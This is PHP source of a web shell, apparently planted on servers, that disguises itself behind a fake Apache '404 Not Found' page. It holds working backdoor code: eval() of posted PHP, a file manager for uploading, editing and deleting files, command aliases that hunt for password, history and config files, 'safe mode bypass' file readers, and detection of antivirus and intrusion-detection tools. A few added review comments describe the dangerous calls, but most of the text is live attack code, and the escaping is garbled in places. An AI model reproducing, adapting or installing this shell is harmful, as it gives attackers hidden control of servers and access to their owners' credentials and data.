Not Found

The requested URL was not found on this server.


Apache Server at Port 80
\\\"dir\\\", \\\"Find index.php in current dir\\\" => \\\"dir /s /w /b index.php\\\", \\\"Find *config*.php in current dir\\\" => \\\"dir /s /w /b *config*.php\\\", \\\"Show active connections\\\" => \\\"netstat -an\\\", \\\"Show running services\\\" => \\\"net start\\\", \\\"User accounts\\\" => \\\"net user\\\", \\\"Show computers\\\" => \\\"net view\\\", \\\"ARP Table\\\" => \\\"arp -a\\\", \\\"IP Configuration\\\" => \\\"ipconfig /all\\\" ); else $aliases = array( \\\"List dir\\\" => \\\"ls -la\\\", \\\"list file attributes on a Linux second extended file system\\\" => \\\"lsattr -va\\\", \\\"show opened ports\\\" => \\\"netstat -an | grep -i listen\\\", \\\"Find\\\" => \\\"\\\", \\\"find all suid files\\\" => \\\"find / -type f -perm -04000 -ls\\\", \\\"find suid files in current dir\\\" => \\\"find . -type f -perm -04000 -ls\\\", \\\"find all sgid files\\\" => \\\"find / -type f -perm -02000 -ls\\\", \\\"find sgid files in current dir\\\" => \\\"find . -type f -perm -02000 -ls\\\", \\\"find config.inc.php files\\\" => \\\"find / -type f -name config.inc.php\\\", \\\"find config* files\\\" => \\\"find / -type f -name \\\\\\\"config*\\\\\\\"\\\", \\\"find config* files in current dir\\\" => \\\"find . -type f -name \\\\\\\"config*\\\\\\\"\\\", \\\"find all writable folders and files\\\" => \\\"find / -perm -2 -ls\\\", \\\"find all writable folders and files in current dir\\\" => \\\"find . -perm -2 -ls\\\", \\\"find all service.pwd files\\\" => \\\"find / -type f -name service.pwd\\\", \\\"find service.pwd files in current dir\\\" => \\\"find . -type f -name service.pwd\\\", \\\"find all .htpasswd files\\\" => \\\"find / -type f -name .htpasswd\\\", \\\"find .htpasswd files in current dir\\\" => \\\"find . -type f -name .htpasswd\\\", \\\"find all .bash_history files\\\" => \\\"find / -type f -name .bash_history\\\", \\\"find .bash_history files in current dir\\\" => \\\"find . 
-type f -name .bash_history\\\", \\\"find all .fetchmailrc files\\\" => \\\"find / -type f -name .fetchmailrc\\\", \\\"find .fetchmailrc files in current dir\\\" => \\\"find . -type f -name .fetchmailrc\\\", \\\"Locate\\\" => \\\"\\\", \\\"locate httpd.conf files\\\" => \\\"locate httpd.conf\\\", \\\"locate vhosts.conf files\\\" => \\\"locate vhosts.conf\\\", \\\"locate proftpd.conf files\\\" => \\\"locate proftpd.conf\\\", \\\"locate psybnc.conf files\\\" => \\\"locate psybnc.conf\\\", \\\"locate my.conf files\\\" => \\\"locate my.conf\\\", \\\"locate admin.php files\\\" =>\\\"locate admin.php\\\", \\\"locate cfg.php files\\\" => \\\"locate cfg.php\\\", \\\"locate conf.php files\\\" => \\\"locate conf.php\\\", \\\"locate config.dat files\\\" => \\\"locate config.dat\\\", \\\"locate config.php files\\\" => \\\"locate config.php\\\", \\\"locate config.inc files\\\" => \\\"locate config.inc\\\", \\\"locate config.inc.php\\\" => \\\"locate config.inc.php\\\", \\\"locate config.default.php files\\\" => \\\"locate config.default.php\\\", \\\"locate config* files \\\" => \\\"locate config\\\", \\\"locate .conf files\\\"=>\\\"locate \\\'.conf\\\'\\\", \\\"locate .pwd files\\\" => \\\"locate \\\'.pwd\\\'\\\", \\\"locate .sql files\\\" => \\\"locate \\\'.sql\\\'\\\", \\\"locate .htpasswd files\\\" => \\\"locate \\\'.htpasswd\\\'\\\", \\\"locate .bash_history files\\\" => \\\"locate \\\'.bash_history\\\'\\\", \\\"locate .mysql_history files\\\" => \\\"locate \\\'.mysql_history\\\'\\\", \\\"locate .fetchmailrc files\\\" => \\\"locate \\\'.fetchmailrc\\\'\\\", \\\"locate backup files\\\" => \\\"locate backup\\\", \\\"locate dump files\\\" => \\\"locate dump\\\", \\\"locate priv files\\\" => \\\"locate priv\\\" ); function printHeader() { if(empty($_POST[\\\'charset\\\'])) $_POST[\\\'charset\\\'] = \\\"UTF-8\\\"; global $color; ?> \\\'><?=$_SERVER[\\\'HTTP_HOST\\\']?>- 404 Not Found Shell V.<?=VERSION?>
\\\'> \\\'> \\\'> \\\'> \\\'> \\\'>
\\\".$path[$i].\\\"/\\\"; } $charsets = array(\\\'UTF-8\\\', \\\'Windows-1251\\\', \\\'KOI8-R\\\', \\\'KOI8-U\\\', \\\'cp866\\\'); $opt_charsets = \\\'\\\'; foreach($charsets as $item) $opt_charsets .= \\\'\\\'; $m = array(\\\'Sec. Info\\\'=>\\\'SecInfo\\\',\\\'Files\\\'=>\\\'FilesMan\\\',\\\'Console\\\'=>\\\'Console\\\',\\\'Sql\\\'=>\\\'Sql\\\',\\\'Php\\\'=>\\\'Php\\\',\\\'Safe mode\\\'=>\\\'SafeMode\\\',\\\'String tools\\\'=>\\\'StringTools\\\',\\\'Bruteforce\\\'=>\\\'Bruteforce\\\',\\\'Network\\\'=>\\\'Network\\\'); if(!empty($GLOBALS[\\\'auth_pass\\\'])) $m[\\\'Logout\\\'] = \\\'Logout\\\'; $m[\\\'Self remove\\\'] = \\\'SelfRemove\\\'; $menu = \\\'\\\'; foreach($m as $k => $v) $menu .= \\\'[ \\\'.$k.\\\' ]\\\'; $drives = \\\"\\\"; if ($GLOBALS[\\\'os\\\'] == \\\'win\\\') { foreach( range(\\\'a\\\',\\\'z\\\') as $drive ) if (is_dir($drive.\\\':\\\\\\\\\\\')) $drives .= \\\'[ \\\'.$drive.\\\' ] \\\'; } echo \\\'\\\'. \\\'\\\'. \\\'
Uname
User
Php
Hdd
Cwd\\\'.($GLOBALS[\\\'os\\\'] == \\\'win\\\'?\\\'
Drives\\\':\\\'\\\').\\\'
:\\\'.substr(@php_uname(), 0, 120).\\\' [Google] [milw0rm]
:\\\'.$uid.\\\' ( \\\'.$user.\\\' ) Group: \\\'.$gid.\\\' ( \\\'.$group.\\\' )
:\\\'.@phpversion().\\\' Safe mode: \\\'.($GLOBALS[\\\'safe_mode\\\']?\\\'ON\\\':\\\'OFF\\\').\\\' [ phpinfo ] Datetime: \\\'.date(\\\'Y-m-d H:i:s\\\').\\\'
:\\\'.viewSize($totalSpace).\\\' Free: \\\'.viewSize($freeSpace).\\\' (\\\'.(int)($freeSpace/$totalSpace*100).\\\'%)
:\\\'.$cwd_links.\\\' \\\'.viewPermsColor($GLOBALS[\\\'cwd\\\']).\\\' [ home ]
:\\\'.$drives.\\\'

Server IP:
\\\'.gethostbyname($_SERVER[\\\"HTTP_HOST\\\"]).\\\'
Client IP:
\\\'.$_SERVER[\\\'REMOTE_ADDR\\\'].\\\'
\\\'. \\\'\\\'.$menu.\\\'
\\\'; } function printFooter() { $is_writable = is_writable($GLOBALS[\\\'cwd\\\'])?\\\"[ Writeable ]\\\":\\\"[ Not writable ]\\\"; ?>
Change dir:
\\\">>\\\">
Read file:
>\\\">
Make dir:
>\\\">
Make file:
>\\\">
Execute:
>\\\">
\\\'> \\\'> Upload file:
>\\\">
= 1073741824) return sprintf(\\\'%1.2f\\\', $s / 1073741824 ). \\\' GB\\\'; elseif($s >= 1048576) return sprintf(\\\'%1.2f\\\', $s / 1048576 ) . \\\' MB\\\'; elseif($s >= 1024) return sprintf(\\\'%1.2f\\\', $s / 1024 ) . \\\' KB\\\'; else return $s . \\\' B\\\'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \\\'s\\\'; elseif (($p & 0xA000) == 0xA000)$i = \\\'l\\\'; elseif (($p & 0x8000) == 0x8000)$i = \\\'-\\\'; elseif (($p & 0x6000) == 0x6000)$i = \\\'b\\\'; elseif (($p & 0x4000) == 0x4000)$i = \\\'d\\\'; elseif (($p & 0x2000) == 0x2000)$i = \\\'c\\\'; elseif (($p & 0x1000) == 0x1000)$i = \\\'p\\\'; else $i = \\\'u\\\'; $i .= (($p & 0x0100) ? \\\'r\\\' : \\\'-\\\'); $i .= (($p & 0x0080) ? \\\'w\\\' : \\\'-\\\'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? \\\'s\\\' : \\\'x\\\' ) : (($p & 0x0800) ? \\\'S\\\' : \\\'-\\\')); $i .= (($p & 0x0020) ? \\\'r\\\' : \\\'-\\\'); $i .= (($p & 0x0010) ? \\\'w\\\' : \\\'-\\\'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? \\\'s\\\' : \\\'x\\\' ) : (($p & 0x0400) ? \\\'S\\\' : \\\'-\\\')); $i .= (($p & 0x0004) ? \\\'r\\\' : \\\'-\\\'); $i .= (($p & 0x0002) ? \\\'w\\\' : \\\'-\\\'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? \\\'t\\\' : \\\'x\\\' ) : (($p & 0x0200) ? \\\'T\\\' : \\\'-\\\')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return \\\'\\\'.perms(@fileperms($f)).\\\'\\\'; elseif (!@is_writable($f)) return \\\'\\\'.perms(@fileperms($f)).\\\'\\\'; else return \\\'\\\'.perms(@fileperms($f)).\\\'\\\'; } if(!function_exists(\\\"scandir\\\")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } function which($p) { $path = ex(\\\'which \\\'.$p); if(!empty($path)) return $path; return false; } function actionSecInfo() { printHeader(); echo \\\'

Server security information

\\\'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo \\\'\\\'.$n.\\\': \\\'; if(strpos($v, \\\"\\\\n\\\") === false) echo $v.\\\'
\\\'; else echo \\\'
\\\'.$v.\\\'
\\\'; } } showSecParam(\\\'Server software\\\', @getenv(\\\'SERVER_SOFTWARE\\\')); showSecParam(\\\'Disabled PHP Functions\\\', ($GLOBALS[\\\'disable_functions\\\'])?$GLOBALS[\\\'disable_functions\\\']:\\\'none\\\'); showSecParam(\\\'Open base dir\\\', @ini_get(\\\'open_basedir\\\')); showSecParam(\\\'Safe mode exec dir\\\', @ini_get(\\\'safe_mode_exec_dir\\\')); showSecParam(\\\'Safe mode include dir\\\', @ini_get(\\\'safe_mode_include_dir\\\')); showSecParam(\\\'cURL support\\\', function_exists(\\\'curl_version\\\')?\\\'enabled\\\':\\\'no\\\'); $temp=array(); if(function_exists(\\\'mysql_get_client_info\\\')) $temp[] = \\\"MySql (\\\".mysql_get_client_info().\\\")\\\"; if(function_exists(\\\'mssql_connect\\\')) $temp[] = \\\"MSSQL\\\"; if(function_exists(\\\'pg_connect\\\')) $temp[] = \\\"PostgreSQL\\\"; if(function_exists(\\\'oci_connect\\\')) $temp[] = \\\"Oracle\\\"; showSecParam(\\\'Supported databases\\\', implode(\\\', \\\', $temp)); echo \\\'
\\\'; if( $GLOBALS[\\\'os\\\'] == \\\'nix\\\' ) { $userful = array(\\\'gcc\\\',\\\'lcc\\\',\\\'cc\\\',\\\'ld\\\',\\\'make\\\',\\\'php\\\',\\\'perl\\\',\\\'python\\\',\\\'ruby\\\',\\\'tar\\\',\\\'gzip\\\',\\\'bzip\\\',\\\'bzip2\\\',\\\'nc\\\',\\\'locate\\\',\\\'suidperl\\\'); $danger = array(\\\'kav\\\',\\\'nod32\\\',\\\'bdcored\\\',\\\'uvscan\\\',\\\'sav\\\',\\\'drwebd\\\',\\\'clamd\\\',\\\'rkhunter\\\',\\\'chkrootkit\\\',\\\'iptables\\\',\\\'ipfw\\\',\\\'tripwire\\\',\\\'shieldcc\\\',\\\'portsentry\\\',\\\'snort\\\',\\\'ossec\\\',\\\'lidsadm\\\',\\\'tcplodg\\\',\\\'sxid\\\',\\\'logcheck\\\',\\\'logwatch\\\',\\\'sysmask\\\',\\\'zmbscap\\\',\\\'sawmill\\\',\\\'wormscan\\\',\\\'ninja\\\'); $downloaders = array(\\\'wget\\\',\\\'fetch\\\',\\\'lynx\\\',\\\'links\\\',\\\'curl\\\',\\\'get\\\',\\\'lwp-mirror\\\'); showSecParam(\\\'Readable /etc/passwd\\\', @is_readable(\\\'/etc/passwd\\\')?\\\"yes [view]\\\":\\\'no\\\'); showSecParam(\\\'Readable /etc/shadow\\\', @is_readable(\\\'/etc/shadow\\\')?\\\"yes [view]\\\":\\\'no\\\'); showSecParam(\\\'OS version\\\', @file_get_contents(\\\'/proc/version\\\')); showSecParam(\\\'Distr name\\\', @file_get_contents(\\\'/etc/issue.net\\\')); if(!$GLOBALS[\\\'safe_mode\\\']) { echo \\\'
\\\'; $temp=array(); foreach ($userful as $item) if(which($item)){$temp[]=$item;} showSecParam(\\\'Userful\\\', implode(\\\', \\\',$temp)); $temp=array(); foreach ($danger as $item) if(which($item)){$temp[]=$item;} showSecParam(\\\'Danger\\\', implode(\\\', \\\',$temp)); $temp=array(); foreach ($downloaders as $item) if(which($item)){$temp[]=$item;} showSecParam(\\\'Downloaders\\\', implode(\\\', \\\',$temp)); echo \\\'
\\\'; showSecParam(\\\'Hosts\\\', @file_get_contents(\\\'/etc/hosts\\\')); showSecParam(\\\'HDD space\\\', ex(\\\'df -h\\\')); showSecParam(\\\'Mount options\\\', @file_get_contents(\\\'/etc/fstab\\\')); } } else { showSecParam(\\\'OS Version\\\',ex(\\\'ver\\\')); showSecParam(\\\'Account Settings\\\',ex(\\\'net accounts\\\')); showSecParam(\\\'User Accounts\\\',ex(\\\'net user\\\')); } echo \\\'
\\\'; printFooter(); } function actionPhp() { if( isset($_POST[\\\'ajax\\\']) ) { $_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']).\\\'ajax\\\'] = true; ob_start(); eval($_POST[\\\'p1\\\']); $temp = \\\"document.getElementById(\\\'PhpOutput\\\').style.display=\\\'\\\';document.getElementById(\\\'PhpOutput\\\').innerHTML=\\\'\\\".addcslashes(htmlspecialchars(ob_get_clean()),\\\"\\\\n\\\\r\\\\t\\\\\\\\\\\'\\\\0\\\").\\\"\\\';\\\\n\\\"; echo strlen($temp), \\\"\\\\n\\\", $temp; exit; } printHeader(); if( isset($_POST[\\\'p2\\\']) && ($_POST[\\\'p2\\\'] == \\\'info\\\') ) { echo \\\'

PHP info

\\\'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(\\\'!body {.*}!msiU\\\',\\\'\\\',$tmp); $tmp = preg_replace(\\\'!a:\\\\w+ {.*}!msiU\\\',\\\'\\\',$tmp); $tmp = preg_replace(\\\'!h1!msiU\\\',\\\'h2\\\',$tmp); $tmp = preg_replace(\\\'!td, th {(.*)}!msiU\\\',\\\'.e, .v, .h, .h th {$1}\\\',$tmp); $tmp = preg_replace(\\\'!body, td, th, h2, h2 {.*}!msiU\\\',\\\'\\\',$tmp); echo $tmp; echo \\\'

\\\'; } if(empty($_POST[\\\'ajax\\\'])&&!empty($_POST[\\\'p1\\\'])) $_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']).\\\'ajax\\\'] = false; echo \\\'

Execution PHP-code

\\\'; echo \\\' send using AJAX
\\\'; 
    // Non-AJAX path of the PHP console: the raw p1 request field is handed to
    // eval(), so whatever PHP the client posts is executed inside this process.
    // Output printed by the evaluated code is captured with output buffering
    // and HTML-escaped before it is echoed back into the page.
    // NOTE(review): eval() applied directly to a $_POST value is a high-signal
    // pattern when scanning a web root for planted scripts.
    if(!empty($_POST[\\\'p1\\\'])) { 
        ob_start(); 
        eval($_POST[\\\'p1\\\']); 
        echo htmlspecialchars(ob_get_clean()); 
    } 
    echo \\\'
\\\'; printFooter(); } function actionFilesMan() { printHeader(); echo \\\'

File manager

\\\'; if(isset($_POST[\\\'p1\\\'])) { switch($_POST[\\\'p1\\\']) { case \\\'uploadFile\\\': if(!@move_uploaded_file($_FILES[\\\'f\\\'][\\\'tmp_name\\\'], $_FILES[\\\'f\\\'][\\\'name\\\'])) echo \\\"Can\\\'t upload file!\\\"; break; break; case \\\'mkdir\\\': if(!@mkdir($_POST[\\\'p2\\\'])) echo \\\"Can\\\'t create new dir\\\"; break; case \\\'delete\\\': function deleteDir($path) { $path = (substr($path,-1)==\\\'/\\\') ? $path:$path.\\\'/\\\'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == \\\"..\\\") || (basename($item) == \\\".\\\") ) continue; $type = filetype($item); if ($type == \\\"dir\\\") deleteDir($item); else @unlink($item); } closedir($dh); rmdir($path); } if(is_array(@$_POST[\\\'f\\\'])) foreach($_POST[\\\'f\\\'] as $f) { $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case \\\'paste\\\': if($_SESSION[\\\'act\\\'] == \\\'copy\\\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != \\\".\\\") and ($f != \\\"..\\\")) { copy_paste($c.$s.\\\'/\\\',$f, $d.$s.\\\'/\\\'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION[\\\'f\\\'] as $f) copy_paste($_SESSION[\\\'cwd\\\'],$f, $GLOBALS[\\\'cwd\\\']); } elseif($_SESSION[\\\'act\\\'] == \\\'move\\\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != \\\".\\\") and ($f != \\\"..\\\")) { copy_paste($c.$s.\\\'/\\\',$f, $d.$s.\\\'/\\\'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION[\\\'f\\\'] as $f) @rename($_SESSION[\\\'cwd\\\'].$f, $GLOBALS[\\\'cwd\\\'].$f); } unset($_SESSION[\\\'f\\\']); break; default: if(!empty($_POST[\\\'p1\\\']) && (($_POST[\\\'p1\\\'] == \\\'copy\\\')||($_POST[\\\'p1\\\'] == \\\'move\\\')) ) { $_SESSION[\\\'act\\\'] = @$_POST[\\\'p1\\\']; $_SESSION[\\\'f\\\'] = @$_POST[\\\'f\\\']; 
foreach($_SESSION[\\\'f\\\'] as $k => $f) $_SESSION[\\\'f\\\'][$k] = urldecode($f); $_SESSION[\\\'cwd\\\'] = @$_POST[\\\'c\\\']; } break; } echo \\\'\\\'; } $dirContent = @scandir(isset($_POST[\\\'c\\\'])?$_POST[\\\'c\\\']:$GLOBALS[\\\'cwd\\\']); if($dirContent === false) { echo \\\'Can\\\\\\\'t open this folder!\\\'; return; } global $sort; $sort = array(\\\'name\\\', 1); if(!empty($_POST[\\\'p1\\\'])) { if(preg_match(\\\'!s_([A-z]+)_(\\\\d{1})!\\\', $_POST[\\\'p1\\\'], $match)) $sort = array($match[1], (int)$match[2]); } ?> \\\"; $dirs = $files = $links = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array(\\\'name\\\' => $dirContent[$i], \\\'path\\\' => $GLOBALS[\\\'cwd\\\'].$dirContent[$i], \\\'modify\\\' => date(\\\'Y-m-d H:i:s\\\',@filemtime($GLOBALS[\\\'cwd\\\'].$dirContent[$i])), \\\'perms\\\' => viewPermsColor($GLOBALS[\\\'cwd\\\'].$dirContent[$i]), \\\'size\\\' => @filesize($GLOBALS[\\\'cwd\\\'].$dirContent[$i]), \\\'owner\\\' => $ow[\\\'name\\\']?$ow[\\\'name\\\']:@fileowner($dirContent[$i]), \\\'group\\\' => $gr[\\\'name\\\']?$gr[\\\'name\\\']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS[\\\'cwd\\\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\\\'type\\\' => \\\'file\\\')); elseif(@is_link($GLOBALS[\\\'cwd\\\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\\\'type\\\' => \\\'link\\\')); elseif(@is_dir($GLOBALS[\\\'cwd\\\'].$dirContent[$i])&& ($dirContent[$i] != \\\".\\\")) $dirs[] = array_merge($tmp, array(\\\'type\\\' => \\\'dir\\\')); } $GLOBALS[\\\'sort\\\'] = $sort; function cmp($a, $b) { if($GLOBALS[\\\'sort\\\'][0] != \\\'size\\\') return strcmp($a[$GLOBALS[\\\'sort\\\'][0]], $b[$GLOBALS[\\\'sort\\\'][0]])*($GLOBALS[\\\'sort\\\'][1]?1:-1); else return (($a[\\\'size\\\'] < $b[\\\'size\\\']) ? 
-1 : 1)*($GLOBALS[\\\'sort\\\'][1]?1:-1); } usort($files, \\\"cmp\\\"); usort($dirs, \\\"cmp\\\"); usort($links, \\\"cmp\\\"); $files = array_merge($dirs, $links, $files); $l = 0; foreach($files as $f) { echo \\\'\\\'; $l = $l?0:1; } ?>
NameSizeModifyOwner/GroupPermissionsActions
\\\'.htmlspecialchars($f[\\\'name\\\']):\\\'g(\\\\\\\'FilesMan\\\\\\\',\\\\\\\'\\\'.$f[\\\'path\\\'].\\\'\\\\\\\');\\\">[ \\\'.htmlspecialchars($f[\\\'name\\\']).\\\' ]\\\').\\\'\\\'.(($f[\\\'type\\\']==\\\'file\\\')?viewSize($f[\\\'size\\\']):$f[\\\'type\\\']).\\\'\\\'.$f[\\\'modify\\\'].\\\'\\\'.$f[\\\'owner\\\'].\\\'/\\\'.$f[\\\'group\\\'].\\\'\\\'.$f[\\\'perms\\\'] .\\\'R T\\\'.(($f[\\\'type\\\']==\\\'file\\\')?\\\' E D\\\':\\\'\\\').\\\'
\\\'> \\\'>  >\\\">
String conversions
\\\'; $stringTools = array( \\\'Base64 encode\\\' => \\\'base64_encode\\\', \\\'Base64 decode\\\' => \\\'base64_decode\\\', \\\'Url encode\\\' => \\\'urlencode\\\', \\\'Url decode\\\' => \\\'urldecode\\\', \\\'Full urlencode\\\' => \\\'full_urlencode\\\', \\\'md5 hash\\\' => \\\'md5\\\', \\\'sha1 hash\\\' => \\\'sha1\\\', \\\'crypt\\\' => \\\'crypt\\\', \\\'CRC32\\\' => \\\'crc32\\\', \\\'ASCII to HEX\\\' => \\\'ascii2hex\\\', \\\'HEX to ASCII\\\' => \\\'hex2ascii\\\', \\\'HEX to DEC\\\' => \\\'hexdec\\\', \\\'HEX to BIN\\\' => \\\'hex2bin\\\', \\\'DEC to HEX\\\' => \\\'dechex\\\', \\\'DEC to BIN\\\' => \\\'decbin\\\', \\\'BIN to HEX\\\' => \\\'bin2hex\\\', \\\'BIN to DEC\\\' => \\\'bindec\\\', \\\'String to lower case\\\' => \\\'strtolower\\\', \\\'String to upper case\\\' => \\\'strtoupper\\\', \\\'Htmlspecialchars\\\' => \\\'htmlspecialchars\\\', \\\'String length\\\' => \\\'strlen\\\', ); if(empty($_POST[\\\'ajax\\\'])&&!empty($_POST[\\\'p1\\\'])) $_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']).\\\'ajax\\\'] = false; echo \\\"
>\\\'/> send using AJAX
\\\"; 
    // The p1 request field is used as a function name and called with p2 as its
    // only argument. function_exists() is the sole check: the $stringTools list
    // is not consulted here, so the callable is chosen entirely by the request.
    // The return value is HTML-escaped before it is echoed.
    // NOTE(review): a variable function call whose name comes from $_POST is
    // worth flagging in static review, like the eval() calls elsewhere in this file.
    if(!empty($_POST[\\\'p1\\\'])) { 
        if(function_exists($_POST[\\\'p1\\\'])) 
        echo htmlspecialchars($_POST[\\\'p1\\\']($_POST[\\\'p2\\\'])); 
    } 
    echo\\\"
\\\"; ?>

Search for hash:







File tools
\\\'; if( !file_exists(@$_POST[\\\'p1\\\']) ) { echo \\\'File not exists\\\'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST[\\\'p1\\\'])); $gid = @posix_getgrgid(@fileowner($_POST[\\\'p1\\\'])); echo \\\'Name: \\\'.htmlspecialchars($_POST[\\\'p1\\\']).\\\' Size: \\\'.(is_file($_POST[\\\'p1\\\'])?viewSize(filesize($_POST[\\\'p1\\\'])):\\\'-\\\').\\\' Permission: \\\'.viewPermsColor($_POST[\\\'p1\\\']).\\\' Owner/Group: \\\'.$uid[\\\'name\\\'].\\\'/\\\'.$gid[\\\'name\\\'].\\\'
\\\'; echo \\\'Create time: \\\'.date(\\\'Y-m-d H:i:s\\\',filectime($_POST[\\\'p1\\\'])).\\\' Access time: \\\'.date(\\\'Y-m-d H:i:s\\\',fileatime($_POST[\\\'p1\\\'])).\\\' Modify time: \\\'.date(\\\'Y-m-d H:i:s\\\',filemtime($_POST[\\\'p1\\\'])).\\\'

\\\'; if( empty($_POST[\\\'p2\\\']) ) $_POST[\\\'p2\\\'] = \\\'view\\\'; if( is_file($_POST[\\\'p1\\\']) ) $m = array(\\\'View\\\', \\\'Highlight\\\', \\\'Download\\\', \\\'Hexdump\\\', \\\'Edit\\\', \\\'Chmod\\\', \\\'Rename\\\', \\\'Touch\\\'); else $m = array(\\\'Chmod\\\', \\\'Rename\\\', \\\'Touch\\\'); foreach($m as $v) echo \\\'\\\'.((strtolower($v)==@$_POST[\\\'p2\\\'])?\\\'[ \\\'.$v.\\\' ]\\\':$v).\\\' \\\'; echo \\\'

\\\'; switch($_POST[\\\'p2\\\']) { case \\\'view\\\': echo \\\'
\\\'; 
            // 'view' mode: stream the file named by the p1 request field into the
            // page in 1024-byte reads, HTML-escaping each chunk. The path is taken
            // straight from the request (only file_exists() is checked earlier), and
            // the @ operators suppress any open/read warnings, so failures are silent.
            $fp = @fopen($_POST[\\\'p1\\\'], \\\'r\\\'); 
            if($fp) { 
                while( !@feof($fp) ) 
                    echo htmlspecialchars(@fread($fp, 1024)); 
                @fclose($fp); 
            } 
            echo \\\'
\\\'; break; case \\\'highlight\\\': if( is_readable($_POST[\\\'p1\\\']) ) { echo \\\'
\\\'; $code = highlight_file($_POST[\\\'p1\\\'],true); echo str_replace(array(\\\'\\\'), array(\\\'\\\'),$code).\\\'
\\\'; } break; case \\\'chmod\\\': if( !empty($_POST[\\\'p3\\\']) ) { $perms = 0; for($i=strlen($_POST[\\\'p3\\\'])-1;$i>=0;--$i) $perms += (int)$_POST[\\\'p3\\\'][$i]*pow(8, (strlen($_POST[\\\'p3\\\'])-$i-1)); if(!@chmod($_POST[\\\'p1\\\'], $perms)) echo \\\'Can\\\\\\\'t set permissions!
\\\'; else die(\\\'\\\'); } echo \\\'
>\\\">
\\\'; break; case \\\'edit\\\': if( !is_writable($_POST[\\\'p1\\\'])) { echo \\\'File isn\\\\\\\'t writeable\\\'; break; } if( !empty($_POST[\\\'p3\\\']) ) { @file_put_contents($_POST[\\\'p1\\\'],$_POST[\\\'p3\\\']); echo \\\'Saved!
\\\'; } echo \\\'
>\\\">
\\\'; break; case \\\'hexdump\\\': $c = @file_get_contents($_POST[\\\'p1\\\']); $n = 0; $h = array(\\\'00000000
\\\',\\\'\\\',\\\'\\\'); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf(\\\'%02X\\\',ord($c[$i])).\\\' \\\'; switch ( ord($c[$i]) ) { case 0: $h[2] .= \\\' \\\'; break; case 9: $h[2] .= \\\' \\\'; break; case 10: $h[2] .= \\\' \\\'; break; case 13: $h[2] .= \\\' \\\'; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf(\\\'%08X\\\',$i+1).\\\'
\\\';} $h[1] .= \\\'
\\\'; $h[2] .= \\\"\\\\n\\\"; } } echo \\\'
\\\'.$h[0].\\\'
\\\'.$h[1].\\\'
\\\'.htmlspecialchars($h[2]).\\\'
\\\'; break; case \\\'rename\\\': if( !empty($_POST[\\\'p3\\\']) ) { if(!@rename($_POST[\\\'p1\\\'], $_POST[\\\'p3\\\'])) echo \\\'Can\\\\\\\'t rename!
\\\'; else die(\\\'\\\'); } echo \\\'
>\\\">
\\\'; break; case \\\'touch\\\': if( !empty($_POST[\\\'p3\\\']) ) { $time = strtotime($_POST[\\\'p3\\\']); if($time) { if(@touch($_POST[\\\'p1\\\'],$time,$time)) die(\\\'\\\'); else { echo \\\'Fail!\\\'; } } else echo \\\'Bad time format!\\\'; } echo \\\'
>\\\">
\\\'; break; case \\\'mkfile\\\': break; } echo \\\'
\\\'; printFooter(); } function actionSafeMode() { $temp=\\\'\\\'; ob_start(); switch($_POST[\\\'p1\\\']) { case 1: $temp=@tempnam($test, \\\'cx\\\'); if(@copy(\\\"compress.zlib://\\\".$_POST[\\\'p2\\\'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo \\\'Sorry... Can\\\\\\\'t open file\\\'; break; case 2: $files = glob($_POST[\\\'p2\\\'].\\\'*\\\'); if( is_array($files) ) foreach ($files as $filename) echo $filename.\\\"\\\\n\\\"; break; case 3: $ch = curl_init(\\\"file://\\\".$_POST[\\\'p2\\\'].\\\"\\\\x00\\\".SELF_PATH); curl_exec($ch); break; case 4: ini_restore(\\\"safe_mode\\\"); ini_restore(\\\"open_basedir\\\"); include($_POST[\\\'p2\\\']); break; case 5: for(;$_POST[\\\'p2\\\'] <= $_POST[\\\'p3\\\'];$_POST[\\\'p2\\\']++) { $uid = @posix_getpwuid($_POST[\\\'p2\\\']); if ($uid) echo join(\\\':\\\',$uid).\\\"\\\\n\\\"; } break; case 6: if(!function_exists(\\\'imap_open\\\'))break; $stream = imap_open($_POST[\\\'p2\\\'], \\\"\\\", \\\"\\\"); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); printHeader(); echo \\\'

Safe mode bypass

\\\'; echo \\\'Copy (read file)
>\\\">

Glob (list dir)
>\\\">

Curl (read file)
>\\\">

Ini_restore (read file)
>\\\">

Posix_getpwuid (\\\"Read\\\" /etc/passwd)
From
To
>\\\">

Imap_open (read file)
>\\\">
\\\'; if($temp) echo \\\'
\\\'.$temp.\\\'
\\\'; echo \\\'
